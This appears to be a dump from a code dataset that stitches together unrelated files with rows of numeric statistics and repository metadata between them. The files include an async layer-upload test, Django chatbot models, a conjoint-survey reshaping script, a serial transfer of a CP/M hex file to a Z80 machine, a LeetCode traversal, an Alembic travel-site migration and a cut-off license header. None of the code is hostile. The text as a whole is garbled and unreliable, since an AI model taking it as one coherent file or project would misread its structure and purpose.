        assert response.is_json
        location = await response.get_json()

        layers_url = "/locations/{}/layers".format(location['id'])

        # Create an object; uploaded layers start out not ready.
        response = await client.post(layers_url, json={"type": "uploaded"})
        assert response.status_code == HTTPStatus.CREATED
        assert response.is_json
        layer = await response.get_json()
        assert isinstance(layer, dict)
        assert layer['id'] is not None
        assert layer['type'] == "uploaded"
        assert layer['ready'] is False

        layer_url = "{}/{}".format(layers_url, layer['id'])

        # Test upload process
        print(layer['imageUrl'])
        response = await client.put(layer['imageUrl'], data="test")
        assert response.status_code == HTTPStatus.CREATED
        assert response.is_json
        layer2 = await response.get_json()
        # NOTE(review): this probably meant isinstance(layer2, dict) —
        # as written it re-checks the object from the earlier POST; verify.
        assert isinstance(layer, dict)
        assert layer2['id'] == layer['id']
        assert layer2['ready'] is True
        assert layer2['updated'] > layer['updated']

        # Test downloading the file round-trips the uploaded bytes.
        response = await client.get(layer['imageUrl'])
        assert response.status_code == HTTPStatus.OK
        data = await response.get_data()
        assert data == "test".encode('utf-8')

        # Test deleting the object; the deleted resource is echoed back.
        response = await client.delete(layer_url)
        assert response.status_code == HTTPStatus.OK
        assert response.is_json
        layer2 = await response.get_json()
        assert layer2['id'] == layer['id']
| 36.342105
| 87
| 0.63903
| 659
| 5,524
| 5.2261
| 0.144158
| 0.126016
| 0.099303
| 0.125436
| 0.809524
| 0.793844
| 0.745354
| 0.700058
| 0.663473
| 0.656214
| 0
| 0.005845
| 0.256698
| 5,524
| 151
| 88
| 36.582781
| 0.832927
| 0.081101
| 0
| 0.721154
| 0
| 0
| 0.049469
| 0
| 0
| 0
| 0
| 0
| 0.538462
| 1
| 0
| false
| 0
| 0.038462
| 0
| 0.038462
| 0.009615
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d6a32a88ac5f328e1d86fc50fe8044d1e5fbd88a
| 1,405
|
py
|
Python
|
chatbot/models.py
|
jazzyeagle/chatbot_website
|
47da27f85907b5f3f7ea94bffd343a6322b8f39a
|
[
"BSD-3-Clause"
] | null | null | null |
chatbot/models.py
|
jazzyeagle/chatbot_website
|
47da27f85907b5f3f7ea94bffd343a6322b8f39a
|
[
"BSD-3-Clause"
] | null | null | null |
chatbot/models.py
|
jazzyeagle/chatbot_website
|
47da27f85907b5f3f7ea94bffd343a6322b8f39a
|
[
"BSD-3-Clause"
] | 1
|
2022-03-05T15:08:45.000Z
|
2022-03-05T15:08:45.000Z
|
from django.db import models
from mainsite.models import User
class Command(models.Model):
    """A chatbot command: a unique trigger name plus the script it runs."""

    class Meta:
        app_label = 'chatbot'

    # Unique trigger name for the command.
    name = models.TextField(unique=True)
    # Script body executed when the command is invoked.
    script = models.TextField()
    # Audit trail: nullable so commands can exist without an owner; deleting
    # the User cascades and removes the command.
    created_by = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True, related_name='original_commands')
    updated_by = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True, related_name='updated_commands')
    # Timestamps maintained automatically by Django.
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
class Variable(models.Model):
    """A named value usable by chatbot scripts (name is not unique here)."""

    class Meta:
        app_label = 'chatbot'

    name = models.TextField()
    value = models.TextField()
    # Audit trail: nullable owner references; deleting the User cascades.
    created_by = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True, related_name='original_variables')
    updated_by = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True, related_name='updated_variables')
    # Timestamps maintained automatically by Django.
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
class ConnectionSetting(models.Model):
    """A single platform/field/value connection setting for the chatbot."""

    class Meta:
        # Fixed: this was `class meta:` (lowercase). Django only recognizes
        # the inner class named `Meta`, so `app_label` was silently ignored
        # and the model fell back to the default app label.
        app_label = 'chatbot'

    # Which chat platform this setting applies to.
    platform = models.TextField()
    # Setting name and its value.
    field = models.TextField()
    value = models.TextField()
    # Timestamps maintained automatically by Django.
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
| 36.025641
| 125
| 0.718149
| 173
| 1,405
| 5.635838
| 0.242775
| 0.107692
| 0.129231
| 0.153846
| 0.828718
| 0.828718
| 0.787692
| 0.751795
| 0.751795
| 0.751795
| 0
| 0
| 0.178648
| 1,405
| 38
| 126
| 36.973684
| 0.844887
| 0
| 0
| 0.464286
| 0
| 0
| 0.063345
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.892857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
d6b05c41072991ea28eea1c8953eb11e86727aec
| 193
|
py
|
Python
|
pyresp/tuplespace/bucket_concurrent_query.py
|
zachasme/pyresp
|
a363cef3435769ba86b86ac1d31576566ca3ddc9
|
[
"MIT"
] | 3
|
2017-10-15T11:55:01.000Z
|
2018-11-04T19:29:34.000Z
|
pyresp/tuplespace/bucket_concurrent_query.py
|
zachasme/pyresp
|
a363cef3435769ba86b86ac1d31576566ca3ddc9
|
[
"MIT"
] | null | null | null |
pyresp/tuplespace/bucket_concurrent_query.py
|
zachasme/pyresp
|
a363cef3435769ba86b86ac1d31576566ca3ddc9
|
[
"MIT"
] | null | null | null |
from threading import Thread, Condition
from . import TupleSpaceBucket, TupleSpaceConcurrentQuery
class TupleSpaceBucketConcurrentQuery(TupleSpaceBucket, TupleSpaceConcurrentQuery):
    """Bucket-backed tuple space combined with concurrent-query support.

    Pure mixin composition: all behavior comes from the two base classes,
    so the body is intentionally empty.
    """
    pass
| 27.571429
| 83
| 0.860104
| 14
| 193
| 11.857143
| 0.714286
| 0.493976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103627
| 193
| 6
| 84
| 32.166667
| 0.959538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
d6cc3e27181b18c31794d88f4b3c951d26cbddfb
| 1,893
|
py
|
Python
|
Conjoint Analysis/data.py
|
victor7246/Academic-Projects
|
dd877fd68ea29e78bfcfe33978eac3f5c5813029
|
[
"MIT"
] | null | null | null |
Conjoint Analysis/data.py
|
victor7246/Academic-Projects
|
dd877fd68ea29e78bfcfe33978eac3f5c5813029
|
[
"MIT"
] | null | null | null |
Conjoint Analysis/data.py
|
victor7246/Academic-Projects
|
dd877fd68ea29e78bfcfe33978eac3f5c5813029
|
[
"MIT"
] | null | null | null |
import pandas
import numpy

# Reshape wide-format conjoint survey responses into long format.
# Input: one row per respondent; columns 0-1 identify the respondent,
# columns 2..16 hold the rating for each of 15 fixed product profiles.
# Output: one row per (respondent, profile) with the profile's dummy-coded
# attribute vector and the rating.
data = pandas.read_csv("data/data.csv")

l = []
for i in range(len(data)):
    # Skip respondents whose first field is missing.
    # Fixed: the original used `data.iloc[i][0] is not numpy.nan`, an
    # identity comparison that does not reliably detect NaN (pandas may
    # produce NaN objects distinct from the numpy.nan singleton);
    # pandas.notna() is the supported missing-value test.
    if pandas.notna(data.iloc[i][0]):
        # Column layout of each appended tuple (original author's note):
        # (row_id, resp_col0, resp_col1, apple, samsung, sony, cl, cm, ch,
        #  pl, pm, ph, sl, sm, sh, ml, mm, mh, pl, pm, ph, pvh, rating)
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,0,1,0,1,0,0,1,0,0,0,1,0,1,0,0,0,1,0,data.iloc[i][2]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,1,0,0,0,1,0,0,1,0,1,0,0,0,0,0,1,data.iloc[i][3]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,1,0,0,0,1,0,0,1,1,0,0,0,1,0,0,1,0,0,data.iloc[i][4]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,1,0,0,0,1,0,0,1,0,1,0,0,1,0,0,1,0,0,data.iloc[i][5]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,1,0,0,1,0,0,0,1,0,0,1,0,1,0,0,0,data.iloc[i][6]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,0,1,data.iloc[i][7]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,0,1,0,0,1,1,0,0,0,0,1,0,1,0,0,1,0,0,data.iloc[i][8]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,0,1,0,0,0,1,0,1,0,0,0,1,0,1,0,0,data.iloc[i][9]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,1,0,1,0,0,0,1,0,0,0,1,0,1,0,0,0,0,1,data.iloc[i][10]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,0,1,0,1,0,0,0,1,0,0,1,0,0,0,0,1,data.iloc[i][11]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,0,1,1,0,0,0,0,1,0,0,1,1,0,0,1,0,0,0,data.iloc[i][12]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,0,1,1,0,0,1,0,0,0,1,0,0,1,0,1,0,0,0,data.iloc[i][13]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,1,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,0,1,data.iloc[i][14]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],0,0,1,0,1,0,0,1,0,0,1,0,1,0,0,1,0,0,0,data.iloc[i][15]))
        l.append((i+1,data.iloc[i][0],data.iloc[i][1],1,0,0,0,1,0,0,1,0,1,0,0,0,1,0,0,1,0,0,data.iloc[i][16]))

pandas.DataFrame(l).to_csv("data/main.csv")
| 75.72
| 141
| 0.577919
| 595
| 1,893
| 1.835294
| 0.090756
| 0.194139
| 0.18956
| 0.190476
| 0.819597
| 0.819597
| 0.819597
| 0.803114
| 0.79304
| 0.792125
| 0
| 0.196046
| 0.038035
| 1,893
| 24
| 142
| 78.875
| 0.403624
| 0
| 0
| 0
| 0
| 0
| 0.014823
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ba3a68ad06555077d9ad0b79684141cb60a1b38f
| 1,539
|
py
|
Python
|
cpm_xfer.py
|
roberts7531/z80Computer
|
28623b04db6c936bc43dd01dde4b736ec99cae67
|
[
"CC0-1.0"
] | null | null | null |
cpm_xfer.py
|
roberts7531/z80Computer
|
28623b04db6c936bc43dd01dde4b736ec99cae67
|
[
"CC0-1.0"
] | null | null | null |
cpm_xfer.py
|
roberts7531/z80Computer
|
28623b04db6c936bc43dd01dde4b736ec99cae67
|
[
"CC0-1.0"
] | null | null | null |
import serial
from intelhex import IntelHex
from time import sleep
ser = serial.Serial('/dev/cu.usbserial-110', 115200)
sleep(3)
f=open("CPM211FilesPkg.txt","r")
text = f.read()
data ="A:DOWNLOAD DUMP.COM\r\nU0\r\n:21000039221502315702CDC101FEFFC21B0111F301CD9C01C351013E80321302210000E5CDA201E1DA5101477DE60FC24401CD7201CD59010FDA51017CCD8F017DCD8F01233E20CD650178CD8F01C32301CD72012A1502F9C9E5D5C50E0BCD0500C1D1E1C9E5D5C50E025FCD0500C1D1E1C93E0DCD65013E0ACD6501C9E60FFE0AD28901C630C38B01C637CD6501C9F50F0F0F0FCD7D01F1CD7D01C90E09CD0500C93A1302FE80C2B301CDCE01B7CAB30137C95F16003C321302218000197EB7C9AF327C00115C000E0FCD0500C9E5D5C5115C000E14CD0500C1D1E1C946494C452044554D502056455253494F4E20312E34240D0A4E4F20494E5055542046494C452050524553454E54204F4E204449534B24EA21F5C5D5E5590E02CD0610E1D1C1F1C9FE20C8FE09C8FE2CC8FE0DC8FE7FCA3C05C90E0DCD15000E0ACD1500C9CD0907FE0DCA2A05CD2400CA41000E04218B063620230DC254000E05218B0677CD0907CD2400CA7200230DCA2A05C360003A8B06FE20C9D630FE0AD8C6F9FE10D8C32A05CD4100CA2A05110000010000218B06097EFE20CAB000CD78006B62292929295F160019EB0379FE04C29100424B7B0504C9CD8500C22A05C921050036C336C3210000220600C9171717E638C917171717E630C9EB2A8B06EB7BBEC2E700237ABEC82B2B2B0DC2DD000DC90604D5118B061ABEC20201231305C2F500>001A"
# Flush a few newlines to wake the remote console, then echo its banner line.
ser.write(("\r\n").encode("ascii"))
ser.write(("\r\n").encode("ascii"))
ser.write(("\r\n").encode("ascii"))
print(ser.readline().decode("ascii"))

# Stream the package one character at a time; the 5 ms pause gives the
# receiving end time to consume each byte (no hardware flow control assumed —
# TODO confirm for this serial link).
j=0
for i in text:
    ser.write((i).encode("ascii"))
    sleep(0.005)
    if(j%10==0):
        # NOTE(review): progress is printed every 10 *characters*, not every
        # 10 percent — very chatty on large files; presumably intentional, verify.
        print(str(int(j/len(text)*100)) + "%")
    j+=1
| 66.913043
| 1,067
| 0.875893
| 89
| 1,539
| 15.146067
| 0.539326
| 0.005935
| 0.02003
| 0.022255
| 0.046736
| 0.046736
| 0.046736
| 0.046736
| 0.046736
| 0.046736
| 0
| 0.493216
| 0.042235
| 1,539
| 22
| 1,068
| 69.954545
| 0.421303
| 0
| 0
| 0.157895
| 0
| 0
| 0.739753
| 0.695511
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.157895
| 0
| 0.157895
| 0.105263
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba493451f45eebc8b73994653b5df394e2852605
| 1,301
|
py
|
Python
|
leetcode.com/python/94_Binary_Tree_Inorder_Traversal.py
|
XSoyOscar/Algorithms
|
6e1626d4b0f7804494f0a651698966ad6fd0fe18
|
[
"MIT"
] | 713
|
2019-11-19T16:11:25.000Z
|
2022-03-31T02:27:52.000Z
|
leetcode.com/python/94_Binary_Tree_Inorder_Traversal.py
|
arunsank/coding-interview-gym
|
8131e3a82795707e144fe55d765b6c15bdb97306
|
[
"MIT"
] | 7
|
2020-01-16T17:07:18.000Z
|
2021-11-15T18:24:39.000Z
|
leetcode.com/python/94_Binary_Tree_Inorder_Traversal.py
|
arunsank/coding-interview-gym
|
8131e3a82795707e144fe55d765b6c15bdb97306
|
[
"MIT"
] | 393
|
2019-11-18T17:55:45.000Z
|
2022-03-28T20:26:32.000Z
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# Solution 1
class Solution(object):
    def inorderTraversal(self, root):
        """Iterative inorder traversal (left, node, right).

        :type root: TreeNode
        :rtype: List[int]
        """
        visited = []
        pending = []
        node = root
        while pending or node is not None:
            # Slide down the left spine, stacking ancestors as we go.
            while node is not None:
                pending.append(node)
                node = node.left
            # Emit the deepest unvisited node, then explore its right subtree.
            node = pending.pop()
            visited.append(node.val)
            node = node.right
        return visited
# Solution 2
class Solution(object):
def inorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
stack, result = [], []
currentNode = root
while currentNode is not None or len(stack) > 0:
if currentNode is not None:
stack.append(currentNode)
currentNode = currentNode.left
else:
currentNode = stack.pop()
result.append(currentNode.val)
currentNode = currentNode.right
return result
| 26.02
| 56
| 0.538816
| 125
| 1,301
| 5.576
| 0.32
| 0.189383
| 0.091822
| 0.114778
| 0.833572
| 0.826399
| 0.826399
| 0.826399
| 0.826399
| 0.826399
| 0
| 0.00489
| 0.371253
| 1,301
| 49
| 57
| 26.55102
| 0.847188
| 0.198309
| 0
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0
| 0
| 0.24
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba4f15d22ecf454fb9f062f74edea5096623107e
| 229
|
py
|
Python
|
greenbot/bothelper.py
|
EMorf/greenbot
|
5528fcb9246109d6742a867b9668a408d43701d6
|
[
"MIT"
] | null | null | null |
greenbot/bothelper.py
|
EMorf/greenbot
|
5528fcb9246109d6742a867b9668a408d43701d6
|
[
"MIT"
] | null | null | null |
greenbot/bothelper.py
|
EMorf/greenbot
|
5528fcb9246109d6742a867b9668a408d43701d6
|
[
"MIT"
] | null | null | null |
import collections
class BotHelper:
    """Process-wide holder for the bot's display name.

    The name is shared class-level state; it defaults to "Unknown" until
    set_bot_name() is called.
    """

    bot_name = "Unknown"

    @staticmethod
    def get_bot_name():
        """Return the currently configured bot name."""
        return BotHelper.bot_name

    @staticmethod
    def set_bot_name(bot_name):
        """Replace the shared bot name with *bot_name*."""
        BotHelper.bot_name = bot_name
| 16.357143
| 37
| 0.681223
| 28
| 229
| 5.25
| 0.428571
| 0.333333
| 0.326531
| 0.190476
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.253275
| 229
| 13
| 38
| 17.615385
| 0.859649
| 0
| 0
| 0.222222
| 0
| 0
| 0.030568
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0.111111
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
2417016372176b54fb5feaf7aa186f625e14dbe5
| 6,206
|
py
|
Python
|
yiyou/migrations/versions/af0f8de842ab_.py
|
aierweisi/yiyou
|
33a3879f45ce9a82f6dac6bd4e8e1ab345ac3be6
|
[
"MIT"
] | 1
|
2019-11-28T11:01:08.000Z
|
2019-11-28T11:01:08.000Z
|
yiyou/migrations/versions/af0f8de842ab_.py
|
aierweisi/yiyou
|
33a3879f45ce9a82f6dac6bd4e8e1ab345ac3be6
|
[
"MIT"
] | null | null | null |
yiyou/migrations/versions/af0f8de842ab_.py
|
aierweisi/yiyou
|
33a3879f45ce9a82f6dac6bd4e8e1ab345ac3be6
|
[
"MIT"
] | null | null | null |
"""empty message
Revision ID: af0f8de842ab
Revises:
Create Date: 2017-12-30 22:35:30.487327
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'af0f8de842ab'
down_revision = None  # None: this is the first migration in the chain
branch_labels = None
depends_on = None
def upgrade():
    """Create the initial schema: reference tables (country, users, city),
    four content tables (foods/hotels/shops/spots), and a comment table
    per content type."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('country',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=50), nullable=False),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('name')
    )
    op.create_table('users',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('username', sa.String(length=20), nullable=False),
    sa.Column('password_hash', sa.String(length=128), nullable=False),
    sa.Column('mail', sa.String(length=64), nullable=False),
    sa.Column('icon', sa.String(length=64), nullable=True),
    sa.PrimaryKeyConstraint('id'),
    sa.UniqueConstraint('username')
    )
    # city references country; the content tables below reference city.
    op.create_table('city',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=50), nullable=False),
    sa.Column('country', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['country'], ['country.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('foods',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=50), nullable=False),
    sa.Column('city', sa.Integer(), nullable=True),
    sa.Column('describe', sa.Text(), nullable=True),
    sa.Column('adress', sa.String(length=100), nullable=False),
    sa.Column('score', sa.Integer(), nullable=False),
    sa.Column('pictures', sa.Text(), nullable=False),
    sa.Column('price', sa.Integer(), nullable=False),
    sa.Column('type', sa.String(length=20), nullable=True),
    sa.ForeignKeyConstraint(['city'], ['city.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('hotels',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=50), nullable=False),
    sa.Column('city', sa.Integer(), nullable=True),
    sa.Column('describe', sa.Text(), nullable=True),
    sa.Column('adress', sa.String(length=100), nullable=False),
    sa.Column('score', sa.Integer(), nullable=False),
    # NOTE(review): 'pictures' is Integer here but Text on every other
    # content table — likely a schema bug; confirm before relying on it.
    sa.Column('pictures', sa.Integer(), nullable=False),
    sa.Column('price', sa.Integer(), nullable=False),
    sa.Column('type', sa.String(length=20), nullable=True),
    sa.Column('rank', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['city'], ['city.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('shops',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=50), nullable=False),
    sa.Column('city', sa.Integer(), nullable=True),
    sa.Column('describe', sa.Text(), nullable=True),
    sa.Column('adress', sa.String(length=100), nullable=False),
    sa.Column('score', sa.Integer(), nullable=False),
    sa.Column('pictures', sa.Text(), nullable=False),
    sa.Column('price', sa.Integer(), nullable=False),
    sa.Column('type', sa.String(length=20), nullable=True),
    sa.ForeignKeyConstraint(['city'], ['city.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('spots',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=50), nullable=False),
    sa.Column('city', sa.Integer(), nullable=True),
    sa.Column('describe', sa.Text(), nullable=True),
    sa.Column('adress', sa.String(length=100), nullable=False),
    sa.Column('score', sa.Integer(), nullable=False),
    sa.Column('pictures', sa.Text(), nullable=False),
    sa.Column('price', sa.Integer(), nullable=False),
    sa.Column('type', sa.String(length=20), nullable=True),
    sa.Column('rank', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['city'], ['city.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # One comment table per content type; each references its content row
    # and the authoring user.
    op.create_table('food_comments',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('content', sa.Text(), nullable=False),
    sa.Column('create_time', sa.DateTime(), nullable=True),
    sa.Column('food', sa.Integer(), nullable=True),
    sa.Column('user', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['food'], ['foods.id'], ),
    sa.ForeignKeyConstraint(['user'], ['users.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('hotel_comments',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('content', sa.Text(), nullable=False),
    sa.Column('create_time', sa.DateTime(), nullable=True),
    sa.Column('hotel', sa.Integer(), nullable=True),
    sa.Column('user', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['hotel'], ['hotels.id'], ),
    sa.ForeignKeyConstraint(['user'], ['users.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('shop_comments',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('content', sa.Text(), nullable=False),
    sa.Column('create_time', sa.DateTime(), nullable=True),
    sa.Column('shop', sa.Integer(), nullable=True),
    sa.Column('user', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['shop'], ['shops.id'], ),
    sa.ForeignKeyConstraint(['user'], ['users.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_table('spot_comments',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('content', sa.Text(), nullable=False),
    sa.Column('create_time', sa.DateTime(), nullable=True),
    sa.Column('spot', sa.Integer(), nullable=True),
    sa.Column('user', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['spot'], ['spots.id'], ),
    sa.ForeignKeyConstraint(['user'], ['users.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # ### end Alembic commands ###
def downgrade():
    """Drop every table created by upgrade(), comment tables first so
    foreign-key dependents go before the tables they reference."""
    # ### commands auto generated by Alembic - please adjust! ###
    for table_name in (
        'spot_comments',
        'shop_comments',
        'hotel_comments',
        'food_comments',
        'spots',
        'shops',
        'hotels',
        'foods',
        'city',
        'users',
        'country',
    ):
        op.drop_table(table_name)
    # ### end Alembic commands ###
| 40.298701
| 70
| 0.649533
| 780
| 6,206
| 5.119231
| 0.110256
| 0.136238
| 0.150263
| 0.205109
| 0.813423
| 0.774856
| 0.762334
| 0.752567
| 0.730528
| 0.705735
| 0
| 0.013374
| 0.144538
| 6,206
| 153
| 71
| 40.562092
| 0.738746
| 0.045601
| 0
| 0.57037
| 0
| 0
| 0.125722
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014815
| false
| 0.007407
| 0.014815
| 0
| 0.02963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
242fe77c00f5bf1e6b6426aa53fb0476e663b194
| 36
|
py
|
Python
|
myname.py
|
salazarvic2-MAS/python-docs-hello-world
|
7c0436ffe2fa6294419fba2cfd8b644c31f6ef6a
|
[
"MIT"
] | null | null | null |
myname.py
|
salazarvic2-MAS/python-docs-hello-world
|
7c0436ffe2fa6294419fba2cfd8b644c31f6ef6a
|
[
"MIT"
] | null | null | null |
myname.py
|
salazarvic2-MAS/python-docs-hello-world
|
7c0436ffe2fa6294419fba2cfd8b644c31f6ef6a
|
[
"MIT"
] | null | null | null |
def get_name():
    """Return the hard-coded display name used by the sample app."""
    name = "Victor"
    return name
| 12
| 19
| 0.638889
| 5
| 36
| 4.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 36
| 2
| 20
| 18
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
79f6daa150201071b3816249b61e6cdb8ca231cb
| 62,401
|
py
|
Python
|
services/core/ActuatorAgent/tests/test_actuator_rpc.py
|
Entek-Technical-Services/BEMOSS3.5
|
581a205b4129530474a5ceee93cb36ef62992d4c
|
[
"BSD-3-Clause"
] | 73
|
2017-07-11T21:46:41.000Z
|
2022-03-11T03:35:25.000Z
|
services/core/ActuatorAgent/tests/test_actuator_rpc.py
|
Entek-Technical-Services/BEMOSS3.5
|
581a205b4129530474a5ceee93cb36ef62992d4c
|
[
"BSD-3-Clause"
] | 19
|
2017-10-10T22:06:15.000Z
|
2022-03-28T21:03:33.000Z
|
services/core/ActuatorAgent/tests/test_actuator_rpc.py
|
Entek-Technical-Services/BEMOSS3.5
|
581a205b4129530474a5ceee93cb36ef62992d4c
|
[
"BSD-3-Clause"
] | 36
|
2017-06-24T00:17:03.000Z
|
2022-03-31T13:58:36.000Z
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2015, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
